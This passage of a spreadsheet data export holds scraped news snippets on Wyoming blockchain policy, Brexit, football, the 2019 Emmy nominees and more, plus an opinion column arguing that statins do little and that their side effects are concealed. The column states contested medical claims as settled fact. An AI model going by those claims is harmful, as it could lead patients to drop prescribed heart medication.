Francisco to Wyoming isn’t necessarily easy. Still excited about the future of blockchain in the state, Powell said part of the reason Kraken was the title sponsor of the weekend’s events was that it was “a great opportunity to bring more awareness to what’s happening here in Wyoming and to get more people involved in it.” Additionally, Charles Hoskinson, founder of cryptocurrency and blockchain company IOHK, wants to set up “some form of a research lab specifically for cryptocurrency and blockchain technology” in Wyoming, noting he’s already discussing the idea with the UW administration. “It’s really exciting to see we may be able to prototype or develop some technology here in Wyoming that could end up being used in Mongolia or Ethiopia or Rwanda,” he told the Boomerang. “We get to say made in America, which is also fun.” Not only is the legislation and regulations enticing, Hoskinson noted that it’s been easy to communicate with lawmakers in the process about what is working for them. While all this is going on, other states and federal agencies like the U.S. Securities Exchange Commission are watching; Hoskinson said Wyoming “is a vital sandbox in the U.S. conversation of what the U.S. policy is going to be for everything.” More than that, he said the legislation has put Wyoming on the map worldwide. “The world is watching,” he said. “Lichtenstein, Luxembourg, Switzerland, Singapore — I’ve been to all these places and high-level officials have all mentioned Wyoming. … It’s just surreal to see how just a little bit of progressive policy in terms of being open to cryptocurrencies has had a dramatic impact on the international conversation.” Now that Wyoming has the world talking, Hoskinson said the companies must start investing in the jurisdiction to watch the work pay off. Powell also noted he wanted to get involved in the weekend’s events to encourage cryptocurrency’s growth in the state and nationwide. “If we can show that Wyoming is leading by example and benefiting from it, then all the better for everyone,” he said. Trying to stay ahead of the curve, on Thursday the Legislature’s Blockchain Task Force voted unanimously to ask Gov. Mark Gordon to support a budget request from the University of Wyoming. “I think it’s critical that, if we’re going to build an entire ecosystem in Wyoming for blockchain, that we have the expertise and a workforce available to support that without having to import everyone,” said Sen. Chris Rothfuss, D-Laramie. “I’m not sure $2 million’s enough, but it’s an excellent start. When you work in a department at a university, you want to make sure you have sufficient critical mass — that you don’t just have one person doing research, but that you’re building a research group and that you have continuity if one person leaves.” Rothfuss co-chairs the blockchain task force. “The continuity is essential and we’re not going to have that unless we have ongoing funds,” he said. UW’s Board of Trustees have asked the state to, beginning in the 2021-2022 biennium, provide $2 million to support the university’s fledgling blockchain programs. According to the funding request signed off by the trustees in July, that $2 million would be used to support UW’s proposed blockchain and fintech certificate programs. Should that funding be provided, UW computer science professor James Caldwell told the blockchain committee UW wants to hire four blockchain professors: two in computer science, one in finance and one in agricultural economics. In recent legislative sessions, the state has provided some one-time funding for UW to begin developing its blockchain and fintech certificates. After legislators appropriated another $2 million in 2019 for UW’s engineering programming, Caldwell some of the funding has been used to hire a professor of practice in computer science. Both Powell and Hoskinson expressed the desire to create some sort of pipeline for Wyoming students to jobs, especially as companies move to the state and as UW implements the blockchain and fintech certificates. “It’s really exciting to see what potential is there and if we can leverage what’s being done on the state’s side into a broader federal policy, I think this is a great way to get that done,” Hoskinson said. Beyond the big legislature activity, the university hosted its second hackathon starting Friday evening. Various tech companies worldwide offered Hackathon challenges with “bounties” — totaling to over $200,000 in prize money for the weekend — with prompts incorporating not only coding but creating 4K-quality video and more. With over 30 teams from at least seven states, the hackathon saw a diverse playing field. Teams included college students, start-up companies and even a high school team from Shoshoni. The winner of the hackathon is also named the wild card entry for today’s SandCastle Foundation Invitational, a blockchain technology pitch competition. EIR Systems, a team from Chattanooga, Tennessee, made the trek to Wyoming just for the SandCastle Invitational. The company combines blockchain technology with the prescription medicine filling process, using its secure transfer processes to help combat issues like overfilling an opioid prescription. “It’s about saving time, saving money and saving lives and that’s really where we felt blockchain was the best application for this tech because of the inherent benefits it brings to the prescribing process,” said company co-founder Ryan Seaberg. Even if they don’t win, the opportunities presented by networking at the BlockChain Stampede events alone was worth the trek to Laramie. It presented a great opportunity not only to visit Wyoming for his first time, co-founder Tyler Seaberg said, but “to be able to learn from a big community of potential developers at the hackathon and people who are also creating businesses in this space.” “There are not blockchain conferences happening all over the United States,” he added. “So, it was a really cool opportunity.” EIR Systems is one of eight competitors vying for the top spot at the SandCastle Invitational, and for a good reason. The winner of Sunday’s competition, considered the competition for the entire North American region, will go on to compete in the final, international SandCastle Challenge in Dubai. SandCastle Foundation chairman Chris Snook said they wanted the Blockchain Stampede to be the location for the North American region of the competition because the recent blockchain legislation Wyoming passed has made the state a “crypto haven.” “This is a really cool, wide-open, wild west kind of ethos but it’s a unique event in that way,” he said. Daniel Bendtsen contributed to this report.</t>
  </si>
  <si>
    <t>A man will face court today charged over the alleged public place shooting in Sydney’s south-west.</t>
  </si>
  <si>
    <t>Former Brexit chief says border down the Irish Sea is the answer Original Source CREATING a border down the Irish Sea would be the best way to solve the backstop conundrum and deliver Brexit, the former head of the UK’s Government Brexit department has said. Philip Rycroft said it was the “simplest way of cutting the Gordian Knot” and would be very attractive to any new government not reliant on the DUP. “I think that is the one to watch,” he told an audience in Edinburgh last night. Mr Rycroft, the permanent secretary at the Department for Exiting the European Union (DExEU) for two years until March, also warned a no-deal Brexit would be “the most scything possible rupture” and said claims that the UK could simply trade on bare-bone WTO rules instead were “fantasies”. No-deal would also see the Irish border become “highly unstable”. He said the “Brexit frenzy” was dismissive of implications for the Union, and suggested a federal UK may be needed to give the UK a future, given the already “soured” relations between London and the devolved administrations over Brexit. He said the country was “in the grip of a political and constitutional crisis the like of which the UK has not experienced for decades or, arguably, in its peculiar dimensions, ever”. Mr Rycroft also said Tory-imposed austerity in the wake of the 2008 Crash had been a big factor in the Leave vote, as people had seen services cut and felt far removed from Westminster. He said the then PM David Cameron had miscalculated when he went for a short campaign in the EU referendum when he should have taken his time to change the public mood. A longer campaign would also have meant more Leave supporters had died, he said. “For the EU referendum, I think what we needed was time. Not least a wee bit of a generational impact. As older people shuffle off this mortal coil… the demographic begins to shift.” The European Commission first proposed Northern Ireland joining the Irish Republic inside the EU single market and customs union to avoid a hard border dividing the island. However Theresa May rejected it out of hand as it would split the UK, with Northern Ireland and Great Britain under different trading regimes. She said it would “threaten the constitutional integrity of the UK by creating a customs and regulatory border down the Irish Sea, and no UK prime minister could ever agree to it”. The DUP, whose 10 MPs propped up her government, were also vehemently opposed to the scheme, arguing it would separate Northern Ireland from the rest of the UK and advance Irish unification. But with the Commons arithmetic now different and an election in sight, Mr Rycroft told a David Hume Institute lecture at Edinburgh University an ‘all-Ireland backstop’ could prevail. He said: “This is the border down the Irish sea. In many ways the simplest way of cutting the Gordian Knot of this. Impossible for Mrs May because of her dependence on the DUP.” He said there would initially be no checks on goods moving west to east from Ireland into Britain, but there would be checks moving east to west. “So Holyhead and Stranraer would become points of external export for both customs and regulatory checks,” he said. “A lot easier to control point to point rather than a long complicated border [across Ireland]. If I was to put money on this, depending on what happens if there’s a general election, I think that solution becomes very attractive to any government wishing to pursue Brexit.” He said even Tory MPs, despite the party’s Unionism, would “in the stillness of the night accept that as a solution. And of course the EU accepts it because that is their solution.” On no-deal, he added: “There will be disruption. This is a system with millions of moving parts. “The Northern Ireland- Ireland border will be highly unstable. The UK will allow goods to come north without let or hindrance, pretty much. The south will require to put in place an external border of the EU. That is not a stable situation, and will have to be resolved very quickly. “The more serious thing is the long-term economic dislocation. What we’d do is overnight put friction into our major trading relationship for both goods and services. That makes UK businesses less competitive selling into our major market. The same applies to EU businesses selling into the UK, but don’t forget that for them it’s about 9 per cent of their trade versus 45% for us.”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Former Brexit chief says border down the Irish Sea is the answer appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>The Kardashian clan will have to find a new platform to hawk their diet drinks.</t>
  </si>
  <si>
    <t>Apple may have far fewer TV shows on its slate than the competition, but it has something they all lack; a billion existing customers.</t>
  </si>
  <si>
    <t>This “change of life” is more than just a collection of stereotypical symptoms that many women experience.</t>
  </si>
  <si>
    <t>Michael Idato</t>
  </si>
  <si>
    <t>This year's Emmys telecast also took a bruising on the ratings front, shedding almost a third of last year's audience to pull just 6.9 million viewers in the US.</t>
  </si>
  <si>
    <t>By Emily Gera, Thursday, September 5th, 2019 00h22 GMT Xenoblade Chronicles: Definitive Edition arrives on Nintendo Switch in 2020. Xenoblade Chronicles: Definitive Edition is the latest game to be unveiled today on Nintendo Direct. Originally released on the Wii in 2010, Xenoblade Chronicles was then launched on 3DS. The next version of Switch promises to improve graphics this time around. Discover it in action for yourself above. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>Penn State women’s volleyball clocked in at No. 4 in the 2019 AVCA Division I Week Two coaches poll, which was released Monday afternoon. The post Penn State Women’s Volleyball Ranked No. 4 In Week Two Division I Poll appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Taylor Swift will not be performing at the race that stops the nation after changes to the US singer's tour have made it "logistically impossible" for her to be there.</t>
  </si>
  <si>
    <t>After hearing from the golf industry about the cost and impracticality, WorkSafeBC is rethinking a plan set to take effect this month that would required golf courses to outfit all of their motorized vehicles with seat belts and rollover protection bars. Tom Fletcher has more here for Kelowna Capital News.</t>
  </si>
  <si>
    <t>Dr Aseem Malhotra</t>
  </si>
  <si>
    <t>It’s been almost 35 years since scientists Michael S. Brown and Joseph L. Goldstein won the Nobel Prize for discovering how blood cholesterol played a central role in the development of heart disease. It was their work that led to the pharmaceutical industry developing statins. Statins are drugs that lower cholesterol, and they both reduced heart attacks, and extended lifespan, within a few years of prescription. In 1996, Goldstein and Brown confidently predicted the end of heart disease as a major public health problem before the beginning of the 21st century. ‘It is still little known or understood amongst the wider medical community that insulin resistance, linked to excess body fat, is the most important risk factor for heart attacks’ However, their prophecy was never fulfilled. On the contrary, the decades-long campaign to lower cholesterol through diet and drugs has completely and utterly failed to curb the global pandemic of heart disease. Indeed, heart disease still remains the biggest killer in the Western world and the UK has recently seen a rise in death rates from the condition for the first time in 50 years. It is still little known or understood amongst the wider medical community that insulin resistance, linked to excess body fat, is the most important risk factor for heart attacks. It is also a clear sign of impending type two diabetes. A disease which costs the NHS £10 billion annually. The good news is insulin resistance can be effectively combatted through a combination of dietary changes, moderate activity and psychological stress reduction. My patient’s experience A few weeks ago, an alarmed and confused patient in his late forties, who I shall call Mr Smith, came to see me for a consultation. Four years earlier, he suffered a heart attack where severe blockages were found in his right coronary artery. These were opened up and kept open with metal stents. He was prescribed atorvastatin, which is standard practice for heart attack patients regardless of cholesterol levels. After starting on atorvastatin, he began experiencing severe muscle pain on exercise. His symptoms disappeared within a week of stopping the drug. Read more Statins review ‘urgently needed’ to find out if millions are benefiting from cholesterol drug As an alternative to his statin, he decided to adopt an ultra-low fat vegan diet which he believed may halt or even reverse heart disease through lowering cholesterol. Within months he dropped his total cholesterol from 5.2mmol/L to 3.2, now placing his levels in the bottom five per cent of the population. Despite sticking religiously to the diet, he began to develop chest pain when he did exercise, and a repeat heart scan showed a 70 per cent blockage in another artery. One that had been completely clear four years before. “How is this possible?” he asked me, clearly upset. “How could I develop more heart disease in such a short space of time with such low cholesterol?” His case was not unusual, nor inexplicable. It was clear that Mr Smith had not addressed 20 years of very high-stress levels that preceded his heart attack, and still continued. He described the level of stress as eight on a scale of zero to 10. I suggested mindfulness meditation and a low refined carbohydrate Mediterranean diet. He ended up looking forward to ditching the supplements he needed to take for his nutrient-deficient vegan diet and eating fish and eggs again. Side effects? There is still controversy about the true rate of side effects from statins because independent researchers have been unable to access the raw data from statin trials. This is a crucial part of solving the statin and cholesterol puzzle, as it is with all drugs. In 2014, a Cochrane review concluded the UK had wasted almost half a billion pounds in stockpiling a flu treatment, Tamiflu. Academics from the Cochrane Collaboration analysed tens of thousands of pages of patient data from drug company Roche. Having eventually been allowed access to this raw data, they found the drug to be no more effective than paracetamol. However, they highlighted worrying side effects in some people taking it to prevent flu, such as kidney problems. Rather than accept the need for greater scrutiny, highly influential cardiologists are attacking those who question the benefits of statins. Those who believed that side effects are much more prevalent are denounced as peddlers of “fake news” or “fake science”. They are compared to “anti-vaxxers”. One Cardiologist, Ann Marie Navar, even wrote in a recent editorial in JAMA Cardiology that inappropriate fears about statin side effects are coming from social media wellness bloggers and that “the number of lives lost to inadequate prevention owing to inappropriate concerns about statins could number in the millions”, but this is not evidence-based. The side effect literature and remarkably high discontinuation rate come from very credible sources. The largest statin survey in the United States, last updated in 2014, found 75 per cent of those prescribed the medication stop it within a year of prescription with 62 per cent of those stating side effects as the reason. Even as far back as 2002, when there was no social media or public awareness of statin side effects, a paper in JAMA of more than 40,000 patients found 60 per cent of heart attack patients aged over 65 will stop the drug within two years. In 2015, the American College of Cardiology published an article online entitled “statin intolerance, not a myth” estimating a true side effect rate of up to 15 per cent. In addition to explaining that more than 300 drugs are known to interact with statins, the authors stated physicians should be aware of the most common risk factors associated with statin intolerance. These included being on higher doses, being aged over 70, being female, having Vitamin D deficiency, kidney and liver disease, alcohol abuse, Asian ethnicity, low body mass index, genetic predisposition and excessive physical activity. how effective are statins in preventing and treating heart disease? (Photo: Matt Cardy/Getty Images) So how effective are statins in preventing and treating heart disease? When one removes the industry funded PR and hype, the results appear pretty underwhelming. In 2015, new research published in BMJ Open found that despite tens of millions more people being prescribed statins across many European countries, there was no evidence that this had any effect on cardiovascular mortality over a 12-year period. If you strip down the statin trials to their moving parts, the data actually reveals that, even in those who have established heart disease, the benefits are very small. Even in this high-risk group, the average increase in life expectancy from taking the drug religiously for five years is a meagre four days, according to an analysis of randomised trials. “It would be of great benefit to do an independent of industry re-trial of statins in heart attack patients to see what the benefits truly are – if any” – Professor Luis Correia, Cardiologist When you combine this with data suggesting more than 50 per cent simply stop taking the medication within two years, it’s easy to explain why there has been no discernible population benefit. Some highly credible researchers even question whether there is any genuine benefit of statin drugs in those who already have heart disease. Eminent French Cardiologist Professor Michel De-Lorgeril, points out that since more stringent regulations on reporting of clinical trials were introduced in 2006 only one statin has been tested in clinical trials. It demonstrated no benefit at all in four trials, and these included a significant number of patients with established heart disease. Professor Luis Correia, Cardiologist, and the director of the Centre for Evidence-Based Medicine at the Medical School of Bahia in Brazil told me: “It would be of great benefit to do an independent of industry re-trial of statins in heart attack patients to see what the benefits truly are – if any.” Sir Richard Thompson, former President of the Royal College of Physicians, said: “In my view, these conflicts of interest and the true incidence of side effects from statins need to be fully and publicly investigated.” John Abramson, an expert in pharmaceutical litigation and a lecturer at Harvard Medical Scool, told me: “Doctors and patients are having to engage in shared decision making on whether a statin should be prescribed on biased and selected data which itself is non-transparent. It’s not just bad science, it’s ethically dubious too.” We continue to have an epidemic of misinformed doctors and misinformed and unwittingly deceived patients. In large part, this has been driven by a multi-billion-dollar food and drug industry that profits from the fear of cholesterol. It’s now time for a full public parliamentary inquiry to push for the raw data on statins to find out who really benefits, and to determine who has been manipulating and hiding data on debilitating side effects. Until then it’s better we focus healthcare resources in tackling the real root cause of heart disease through prioritising lifestyle changes. Dr Aseem Malhotra is an NHS Consultant Cardiologist and Professor of Evidence Based Medicine More from iviews Fleabag shows how men were the real winners of the sexual revolution Get Ready For Brexit: I filled out the campaign questionnaire How Brexit uncertainty is affecting EU families in Britain Those against Boris Johnson and his assault on democracy can act now If Boris Johnson wanted to get tough on crime he’d legalise drugs I hate autumn and the weird people who love it The post We need a Parliamentary inquiry to push for the raw data on statins and their effects appeared first on inews.co.uk. The post We need a Parliamentary inquiry to push for the raw data on statins and their effects appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Book now – http://top10hotel.info/waldorf-astoria-ras-al-khaimah Waldorf Astoria Ras Al Khaimah, Ras al Khaimah, UAE Vienna Street, Ras al Khaimah, United Arab Emirates Guests love: great pool area, wonderful staff, excellent quality of food, boutique style The post Waldorf Astoria Ras Al Khaimah, Ras al Khaimah, UAE – 5 star hotel appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>‘I would be thrilled if Neymar came back,’ says Barcelona‘s Messi Barcelona captain Lionel Messi would be “thrilled” if Neymar returned to the Catalan side but insisted they could still win trophies without the Brazilian. In an interview with the Catalan newspaper Sport this week, Messi said the return of Neymar, who was at Barca from 2013 and 2017 when he left for Paris Saint-Germain, could only strengthen the Spanish champions. “I would be thrilled if Neymar came back,” said the Argentine. “I understand that not everyone agrees. That’s normal after everything that happened around Ney, the way in which he left, the way he abandoned us. “But when you look at the sporting angle, for me Neymar is one of the best players in the world and obviously would improve our chances of getting the results we want.” The summer transfer window saw an on-off soap opera surrounding the 27-year-old’s apparent desire to leave PSG, who paid a world record 222 million euros ($264 million at the time) in 2017, with Barcelona and Real Madrid both linked. Ultimately he stayed in the French capital, at least for the time being. “I am not disappointed,” said Messi. “I would have liked it if he had come and been with us but, as I have said, we have an exceptional squad to challenge for every title, even without him.” Messi denied reports he had used his influence to try and force the Barcelona board to push through the deal. “Here, it is not me that gives the orders,” he said. “We never said that he had to be brought in. We didn’t make any demands.” “I don’t know if the club (Barcelona) wanted it to happen. What I do know is that Neymar really wanted it. But I understand it is very difficult to negotiate with PSG.” Barcelona president Josep Maria Bartomeu said on Friday Neymar “did everything” to force through a return to the Camp Nou in the close season, but his club could “not meet” the French champions’ demands. This post ‘I would be thrilled if Neymar came back,’ says Barcelona’s Messi appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>KSI is set to get back in the boxing ring to face off against Logan Paul in a rematch following on from their match last year which ended in a majority draw. Ahead of the fight, KSI has hit out at his rival on Good Morning Britain, explaining that the two of them are “not friends”. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Laura Chung</t>
  </si>
  <si>
    <t>"Employers are putting profit ahead of safety," the union has said in response to a string of construction worker injuries across Sydney this week.</t>
  </si>
  <si>
    <t>Man City fans react to referee appointment for Norwich fixture Original Source Manchester City fans have reacted to the news that Kevin Friend will be the referee in charge for their Premier League fixture against Norwich City at the weekend. City return to action following the international break with a trip to Carrow Road on Saturday, August 14, looking to extend their unbeaten start to the season. However, fans aren’t pleased after it was revealed that Friend would be the man in the middle for the encounter with Anthony Taylor providing VAR assistance. Read More Friend came under fire on match day four after ruling that Jack Grealish had dived in the build up to Aston Villa’s late goal against Crystal Palace meaning it was chalked off. Grealish received a booking for simulation despite appearing to return to his feet immediately and Villa went on to lose the game 1-0. City fans took to social media to express their frustration at Friend’s appointment. Worst call ever Horror show Game over Screwed Read More Read More Lucky Canaries Denied Punny Doomed Read More Full officials list for Norwich vs Manchester City Referee: Kevin Friend Assistants: Matthew Wilkes, Sian Massey-Ellis Fourth official: Peter Bankes VAR: Anthony Taylor Assistant VAR: Gary Beswick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 City fans react to referee appointment for Norwich fixture appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>2019 Emmys Winners: The Complete List Original Source After months of binge-watching, critiquing and enjoying countless hours of television, the night has finally come. The 2019 Emmy Awards are finally here. Of course, it’s always hard to choose a favorite show when there are so many quality series to choose from and this year was no exception. 2019 saw the end of fan-favorite series like Veep and Game of Thrones, in addition to Schitt’s Creek and Big Bang Theory, all of which were created by the best minds in Hollywood. All of this makes it incredibly difficult to predict the stars who will take home the shimmering statuette. But, alas, the votes are in and it’s time to find out which A-listers will take the stage to make a riveting acceptance speech. And luckily for the pop culture fans, E! News will be covering every moment and award from the 2019 Emmys, so make sure to tune-in as we update the list of winners throughout the night. Outstanding Comedy Series Barry (HBO) Fleabag (Prime Video) Russian Doll (Netflix) Schitt’s Creek (Pop TV) The Good Place (NBC) The Marvelous Mrs. Maisel (Prime Video) Veep (HBO) Outstanding Lead Actor in a Comedy Series Bill Hader, Barry Anthony Anderson, black-ish Ted Danson, The Good Place Don Cheadle, Black Monday, Eugene Levy, Schitt’s Creek Michael Douglas, The Kominsky Method Outstanding Lead Actress in a Comedy Series Christina Applegate, Dead to Me Natasha Lyonne, Russian Doll Phoebe Waller-Bridge, Fleabag Catherine O’Hara, Schitt’s Creek Rachel Brosnahan, The Marvelous Mrs. Maisel Julia Louis-Dreyfus, Veep Outstanding Supporting Actor in a Comedy Series Stephen Root, Barry Henry Winkler, Barry Anthony Carrigan, Barry Alan Arkin, The Kominsky Method Tony Shalhoub, The Marvelous Mrs. Maisel Tony Hale, Veep Outstanding Supporting Actress in a Comedy Series Sarah Goldberg, Barry Sian Clifford, Fleabag Olivia Colman, Fleabag Betty Gilpin, Glow Kate McKinnon, Saturday Night Live Alex Borstein, The Marvelous Mrs. Maisel Marin Hinkle, The Marvelous Mrs. Maisel Anna Chlumsky, Veep Outstanding Guest Actor in a Comedy Series Matt Damon, Saturday Night Live Robert De Niro, Saturday Night Live John Mulaney, Saturday Night Live Adam Sandler, Saturday Night Live Luke Kirby, The Marvelous Mrs. Maisel Rufus Sewell, The Marvelous Mrs. Maisel Peter MacNicol, Veep Outstanding Guest Actress in a Comedy Series Fiona Shaw, Fleabag Sandra Oh, Saturday Night Live Kristin Scott Thomas, Fleabag Emma Thompson, Saturday Night Live Maya Rudolph, The Good Place Jane Lynch, The Marvelous Mrs. Maisel Outstanding Directing for a Comedy Series Barry,”The Audition” (HBO) Barry, “ronny/lily” (HBO) Fleabag,”Episode 1″ (Prime Video) The Big Bang Theory, “The Stockholm Syndrome” (CBS) The Marvelous Mrs. Maisel, “All Alone” (Prime Video) The Marvelous Mrs. Maisel, “We’re Going To The Catskills!” (Prime Video) BBC/Two Brothers/Luke Varley Outstanding Writing for a Comedy Series Barry, “ronny/lily” (HBO) Fleabag, “Episode 1” (Prime Video) PEN15, “Anna Ishii-Peters” (Hulu) Russian Doll, “A Warm Body” (Netflix) Russian Doll, “Nothing In This World Is Easy” (Netflix) The Good Place, “Janet(s)” (NBC) Veep, “Veep” (HBO) Outstanding Drama Series Better Call Saul (AMC) Bodyguard (Netflix) Game of Thrones (HBO) Killing Eve (BBC America) Ozark (Netflix) Pose (FX Networks) Succession (HBO) This Is Us (NBC) Outstanding Lead Actor in a Drama Series Bob Odenkirk, Better Call Saul Kit Harington, Game of Thrones Jason Bateman, Ozark Billy Porter, Pose Sterling K. Brown, This Is Us Milo Ventimiglia, This Is Us Outstanding Lead Actress in a Drama Series Emilia Clarke, Game of Thrones Robin Wright, House of Cards Viola Davis, How To Get Away With Murder Sandra Oh, Killing Eve Jodie Comer, Killing Eve Laura Linney, Ozark Mandy Moore, This Is Us Outstanding Supporting Actor in a Drama Series Jonathan Banks, Better Call Saul Giancarlo Esposito, Better Call Saul Alfie Allen, Game of Thrones Nikolaj Coster-Waldau, Game of Thrones Peter Dinklage, Game of Thrones Michael Kelly, House of Cards Chris Sullivan, This Is Us Outstanding Supporting Actress in a Drama Series Lena Headey, Game of Thrones Sophie Turner, Game of Thrones Maisie Williams, Game of Thrones Gwendoline Christie, Game of Thrones Fiona Shaw, Killing Eve Julia Garner, Ozark Outstanding Guest Actor in a Drama Series Michael McKean, Better Call Saul Glynn Turman, How To Get Away With Murder Bradley Whitford, The Handmaid’s Tale Kumail Nanjiani, The Twilight Zone Michael Angarano, This Is Us Ron Cephas Jones, This Is Us Outstanding Guest Actress in a Drama Series Jessica Lange, American Horror Story: Apocalypse Carice van Houten, Game of Thrones Cicely Tyson, How To Get Away With Murder Laverne Cox, Orange Is The New Black Cherry Jones, The Handmaid’s Tale Phylicia Rashad, This Is Us Outstanding Writing for a Drama Series Better Call Saul, “Winner” (AMC) Bodyguard, “Episode 1” (Netflix) Game Of Thrones, “The Iron Throne” (HBO) Killing Eve, “Nice And Neat” (BBC America) Succession, “Nobody Is Ever Missing” (HBO) The Handmaid’s Tale, “Holly” (Hulu) Outstanding Lead Actress in a Limited Series or Movie Amy Adams, Sharp Objects Patricia Arquette, Escape at Dannemora Aunjanue Ellis, When They See Us Joey King, The Act Niecy Nash, When They See Us Michelle Williams, Fosse/Verdon Outstanding Lead Actor in a Limited Series or Movie Mahershala Ali, True Detective Benicio del Toro, Escape at Dannemora Hugh Grant, A Very English Scandal Jared Harris, Chernobyl Jharrel Jerome, When They See Us Sam Rockwell, Fosse/Verdon Outstanding Directing for a Drama Series Game of Thrones, “The Iron Throne” (HBO) Game of Thrones, “The Last Of The Starks” (HBO) Game of Thrones, “The Long Night” (HBO) Killing Eve, “Desperate Times” (BBC America) Ozark, “Reparations” (Netflix) Succession, “Celebration” (HBO) The Handmaid’s Tale, “Holly” (Hulu) Outstanding Directing for a Limited Series, Movie or Dramatic Special A Very English Scandal (Prime Video) Chernobyl (HBO) Escape At Dannemora (Showtime) Fosse/Veron, “Glory” (FX Networks) Fosse/Verdon, “Who’s Got The Pain” (FX Networks) When They See Us (Netflix) Outstanding Directing for a Reality Program American Ninja Warrior, “Minneapolis City Qualifiers” (NBC) Queer Eye, “Black Girl Magic” (Netflix) RuPaul’s Drag Race, “Whatcha Unnpackin?” (VH1) Shark Tank, “Episode 1002” (ABC) The Amazing Race, “Who Wants A Rolex?” (CBS) Outstanding Directing for a Variety Series Documentary Now!, “Waiting For The Artist” (IFC) Drunk History, “Are You Afraid Of The Drunk?” (Comedy Central) Last Week Tonight With John Oliver, “Psychics” (HBO) Saturday Night Live, “Host: Adam Sandler” (NBC) The Late Show With Stephen Colbert, “Live Midterm Election Show” (CBS) Who Is America?, “Episode 102” (Showtime) Outstanding Directing for a Variety Special Carpool Karaoke: When Corden Met McCartney Live Form Liverpool (CBS) Homecoming: A Film By Beyoncé (Netflix) Live In Front Of A Studio Audience: Norman Lear’s ‘All In The Family’ And ‘The Jeffersons’ (ABC) Springsteen On Broadway (Netflix) The Oscars (ABC) Outstanding Documentary or Nonfiction Special FYRE: The Greatest Party That Never Happened (Netflix) Jane Fonda In Five Acts(HBO) Leaving Neverland(HBO) Love, Gilda(CNN) Minding The Gap(Hulu) The Inventor: Out For Blood In Silicon Valley(HBO) Outstanding Host for a Reality or Competition Program Ellen DeGeneres, Ellen’s Game Of Games Amy Poehler &amp; Nick Offerman, Making It RuPaul, RuPaul’s Drag Race James Corden, The World’s Best Marie Kondo, Tidying Up With Marie Kondo Outstanding Television Movie Bandersnatch (Black Mirror) (Netflix) Brexit (HBO) Deadwood (HBO) King Lear (Prime Video) My Dinner With Hervé (HBO) Outstanding Limited Series Chernobyl (HBO) Escape At Dannemora (Showtime) Fosse/Verdon (FX Networks) Sharp Objects (HBO) When They See Us (Netflix) Outstanding Competition Program American Ninja Warrior (NBC) Nailed It! (Netflix) RuPaul’s Drag Race (VH1) The Amazing Race (CBS) The Voice (NBC) Top Chef (Bravo) Outstanding Short Form Comedy or Drama Series An Emmy For Megan (anemmyformegan.com) Hack Into Broad City (Comedy Central) It’s Bruno! (Netflix) Special (Netflix) Outstanding Short Form Nonfiction or Reality Series Creating Saturday Night Live (NBC) Fosse/Verdon (Inside Look) (FX Networks) Pose: Identity, Family, Community (Inside Look) RuPaul’s Drag Race’s: Out Of The Closet (VH1) RuPaul’s Drag Race’s: Portrait Of A Queen (VH1) Oustanding Short Form Variety Series Billy On The Street (FunnyOrDie) Carpool Karaoke: The Series (Apple Music) Gay of Thrones (FunnyorDie) Honest Trailers (YouTube) The Randy Rainbow Show (YouTube) Outstanding Supporting Actor in a Limited Series or Movie Ben Whishaw, A Very English Scandal Stellan Skarsgard, Chernobyl Paul Dano, Escape At Dannemora Michael K. Williams, When They See Us Asante Blackk, When They See Us John Leguizamo, When They See Us Outstanding Supporting Actress in a Limited Series or Movie Emily Watson, Chernobyl Margaret Qualley, Fosse/Verdon Patricia Clarkson, Sharp Objects Patricia Arquette, The Act Marsha Stephanie Blake, When They See Us Vera Farmiga, When They See Us Outstanding Variety Talk Series Full Frontal With Samantha Bee (TBS) Jimmy Kimmel Live! (ABC) Last Week Tonight With John Oliver (HBO) The Daily Show With Trevor Noah (Comedy Central) The Late Late Show With James Corden (CBS) The Late Show With Stephen Colbert (CBS) Outstanding Variety Sketch Series At Home With Amy Sedaris (truTV) Documentary Now! (IFC) Drunk History (Comedy Central) I Love You, America With Sarah Silverman (Hulu) Saturday Night Live(NBC) Who Is America? (Showtime) Outstanding Structured Reality Program Antiques Roadshow (PBS) Diners, Drive-Ins And Dives (Food Network) Queer Eye (Netflix) Shark Tank (ABC) Tidying Up With Marie Kondo (Netflix) Who Do You Think You Are? (TLC) Outstanding Unstructured Reality Program Born This Way (A&amp;E) Deadliest Catch (Discovery Channel) Life Below Zero (National Geographic) RuPaul’s Drag Race: Untucked (VH1) Somebody Feed Phil (Netflix) United Shades Of America With W. Kamau Bell (CNN) Outstanding Variety Special (Live) 72ndAnnual Tony Awards (CBS) Live In Front Of A Studio Audience: Norman Lear’s ‘All In The Family’ And ‘The Jeffersons’ (ABC) RENT (FOX) The 61stGrammy Awards (CBS) The 76thAnnual Golden Globe Awards (NBC) The Oscars (ABC) Outstanding Variety Special (Pre-Recorded) Carpool Karaoke: When Corden Met McCartney Life From Liverpool (CBS) Hannah Gadsby: Nanette (Netflix) Homecoming: A Film By Beyoncé (Netflix) Springsteen On Broadway (Netflix) Wanda Sykes: Not Normal (Netflix) Outstanding Actress in a Short Form Comedy or Drama Series Abbi Jacobson, Hack Into Broad City Jessica Hecht, Special Rosamund Pike, State Of The Union Ilana Glazer, Hack Into Broad City Punam Patel, Special Outstanding Actor in a Short Form Comedy or Drama Series Patton Oswalt, An Emmy For Megan Jimmy Fallon, Beto Breaks The Internet Ed Begley Jr., Ctrl Alt Delete Chris O’Dowd, State Of The Union Outstanding Writing for a Limited Series, Movie or Dramatic Special A Very English Scandal (Prime Video) Chernobyl (HBO) Escape At Dannemora,”Episode 6″ (Showtime) Escape At Dannemora, “Episode 7” (Showtime) Fosse/Verdon, “Providence” (FX Networks) When They See Us, “Part Four” (Netflix) Outstanding Writing for a Variety Series Documentary Now! (IFC) Full Frontal With Samantha Bee (TBS) Last Week Tonight With John Oliver (HBO) Late Night With Seth Meyers (NBC) Saturday Night Live (NBC) The Late Show With Stephen Colbert (CBS) var fbstarttime = new Date(); !function(f,b,e,v,n,t,s) if (f.fbq) return; n = f.fbq = function() n.callMethod? 